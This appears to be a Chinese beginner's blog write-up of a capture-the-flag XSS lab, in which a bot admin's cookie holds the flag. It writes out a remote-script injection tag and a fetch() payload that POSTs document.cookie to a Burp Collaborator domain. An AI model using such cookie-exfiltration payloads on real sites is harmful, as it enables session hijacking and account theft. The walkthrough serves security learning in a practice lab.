道心网络安全学习笔记系列之好靶场的XSS靶场
各位师傅好,萌新我又来了,今天又开始打靶了,第一个靶场是《学Xss要会打Cookie》
打开以后是这个样子
这还不简单,js里获取cookie的命令时document.cookie,直接alert弹出,小easy.
我擦,并没有预想中弹出cookie,怎么回事?
查看提示,flag在cookie里,每30秒会检查一次,也就是要拿到cookie,需要注入xss代码,让后台管理员检查靶场时偷取它的cookie,而题目首页也说cookie在服务端,必须有个xss平台接收cookie。
这好办,先找个xss平台接收先,一搜,还挺多。
顺便找一个注册,然后配置一下,如何配置请自行搜索,实在不会的留言,这样,我们得到了一段形如<sCRiPt sRC=//xxxx.com/3XUtET></sCrIpT>的代码,我们写入文本框,等待30秒后接收。
结果接收的信息里根本就没有cookie,不知道是平台的问题还是网站的问题,换个网站要么要邀请码,要么打不开,自己搭个又懒得搭,只能换个方法获取cookie。
搜索了一圈,突然发现bp就有个功能模块可以获取临时域名接收cookie,打开bp,点击collaborator,在重发器后面的那个,点击复制到剪贴板,把临时域名复制下来,然后拼接以下代码
<script> fetch('http://临时域名', { method: 'POST', mode: 'no-cors', body: document.cookie }); </script>
把临时域名换成你刚刚复制的域名,然后把内容粘贴到靶场的输入框,然后点下面的立即轮询,
很快,请求包里就看到了网站发来的flag,直接过关。
